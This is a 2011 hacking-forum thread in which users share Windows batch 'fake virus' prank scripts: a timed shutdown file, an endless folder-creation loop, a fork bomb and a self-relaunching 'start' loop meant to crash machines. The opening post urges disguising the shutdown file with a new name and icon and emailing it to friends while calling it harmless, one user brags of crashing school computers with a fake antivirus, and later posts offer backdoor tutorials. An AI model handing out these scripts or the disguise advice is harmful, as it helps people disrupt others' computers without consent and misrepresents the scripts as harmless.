Share | 

How to make a fake virus!

View previous topic View next topic Go down 
AuthorMessage
TheGrimReaper
TheGrimReaper

Points Points : 6242

How to make a fake virus! _
PostSubject: How to make a fake virus!   How to make a fake virus! I_icon_minitimeFri May 06, 2011 11:08 pm

OK, most of you will know that making viruses involves C++

So I'm going to show you how to make a couple of viruses using your NotePad,

Shutting Down Computer

Step 1: Open NotePad

Step 2: Copy this code in their.

Code:
shutdown -s -t 60 -c "Your message goes here"

"Your message goes here" basically means what you write instead of that, it will appear when the computer is shutting down.

Now the important bit. Go to "save as" and saved the name to anything BUT MAKE SURE YOU HAVE .BAT EXTENSION AT THE END!

Then close and you will have it wherever you saved it. Now you can run it as it won't affect your computer just close it!
Make sure you saved all work you might be doing like GFX or just school work.

To make it really fun you could send it via E-mail to a friend (Don't worry it's harmless!)

And to make the file more realistic you could rename it and change the icon. I don't know be creative GJ!

More codes to try

1000 Folders:

Code:
@echo off
:top
md %random%
goto top

Fork bomb (everyone should know this but still here you go)

Code:
%0|%0

I will be posting more codes soon for you guys! Or if you want I can show you how to make Real deadly one Wink
Back to top Go down
DarK_DemoN
DarK_DemoN

Points Points : 6144

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSat May 07, 2011 1:04 am

Lol you could do something like this:

Code:
@echo off
start
start
start
start
start
start
start

After the "start"s you have to add hack.bat and name the file that as well. I would have put that with the rest of the code in the code box but it wouldnt show it everytime i tryed lol

On older computers it opens the command promt so many times that it crashes, newer ones either see this as a Flood Trojan or stop the code from executing for self-preservation.

I made an entire fake virus protection program that turns into a "virus" at the end and shuts down the computer scaring the shit out of who ever was on it. Works gret at school too cause after it shuts down the teacher is afraid to touch the computer lol

Anyway, nice codes Reaper Very Happy. If you want ill post some other fake viruses i made in C++ for you to look at as C++ works better than batch lol

Oh yeh, to whoever reads this thinking that youre actually programing well think again. Batch is a scripting language and even though you can do alot of cool things with it, just like HTML, you cant make a full-blown program. Batch is mainly used for fixing computer problems or in most cases, to make REAL viruses, but as anti virus programs are getting stronger and better, hackers have been moving to REAL programing languages like C++ and Python for their virus needs.

Sorry if that info was "spam" just thought id inform people about what the difference between scripting and programing are and why batch isnt actually programing in case some people get confused
Back to top Go down
http://1337codez.co.cc
TheGrimReaper
TheGrimReaper

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSat May 07, 2011 9:36 am

Lol, OK when I need fake virus codes I'll ask you Demon GJ!

I used to be a noob at programming but now I am looking into the complexed stuff like back-dooring. But I haven't quite covered all of it but I know you have, so could put up a few tutorials or something?

Anyway thanks in advance Demon Smile
Back to top Go down
DarK_DemoN
DarK_DemoN

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSun May 08, 2011 1:18 am

Back-Dooring? Lol its not programing, a Back-Door is a type of virus but i know what you meant Wink

Just tell me what you want to learn and ill post some stuff, but as making viruses is illegal it would be a good move to ask ninja first and since you are the one who wants to learn its up to you to ask him Wink but i have no problem teaching you
Back to top Go down
TheGrimReaper
TheGrimReaper

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSun May 08, 2011 2:28 am

I know it's not programming but I was just saying I am switching to a new type of thing which is Back-dooring. I'll give the tutorial a miss as Ninja probably don't like at moment. I'll ask him another time. But thanks for offer Demon GJ!
Back to top Go down
DarK_DemoN
DarK_DemoN

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSun May 08, 2011 2:42 am

Yup no problem. I could probably add the tut as long as i add a "This is for educational purposes ONLY" type of disclaimer but im not sure. Back-Dooring is very useful but also very old
Back to top Go down
Squeeb
24/7 superman
24/7 superman
Squeeb

Points Points : 2376

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeWed May 11, 2011 5:19 am

that shutting down the comp was shown to you by AJ -.-'
Back to top Go down
TheGrimReaper
TheGrimReaper

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeWed May 11, 2011 5:24 am

hghghg wrote:

Wrong, I searched it on Google. Ask him if you like GJ!
Back to top Go down
DarK_DemoN
DarK_DemoN

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeWed May 11, 2011 9:41 am

The shutdown command is easy as hell to learn (i actually taught myself).

There are different "sub-commands" for the shutdown command:

• -s //shutdown
• -r //restart
• -l //logoff
• -s -t //timed shutdown, but windows automatically has a 60 second timer for the regular shutdown command

There are more but im too busy to post them

And Google is ALWAYS your friend when you need to know/learn something, so its kind of hard to accuse him getting the command from someone else hg, and it doesnt really matter if he did.... Just sayin
Back to top Go down
Squeeb
24/7 superman
24/7 superman
Squeeb

Points Points : 2376

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSat May 14, 2011 2:53 pm

TheGrimReaper wrote:
hghghg wrote:

Wrong, I searched it on Google. Ask him if you like GJ!

idk i remember AJ showing us the shutdown command in the chatbox o.0
Back to top Go down
DarK_DemoN
DarK_DemoN

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitimeSat May 14, 2011 3:04 pm

Lol well hg, its easy to get it from different sources :p

If you know C++ (which you should learn if you want to keep making these) the shutdown command is:
Code:

Shutdown -s
as well! (lol the shutdown command for Windows is always the same no matter what language you use to program)
You just need to add a new header to your code which is:
Code:

#include <windows.h>
You need that header for any system commands/functions youre going to call/use. Just like you need:
Code:

#include <iostream>
For any input/output functions your going to use
Back to top Go down
Sponsored content

PostSubject: Re: How to make a fake virus!   How to make a fake virus! I_icon_minitime

Back to top Go down

How to make a fake virus!

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
ChEaTdEViCe ::  :: Programming :: C++ Programinng Basics-
Free forum | ©phpBB | Free forum support | Report an abuse | Forumotion.com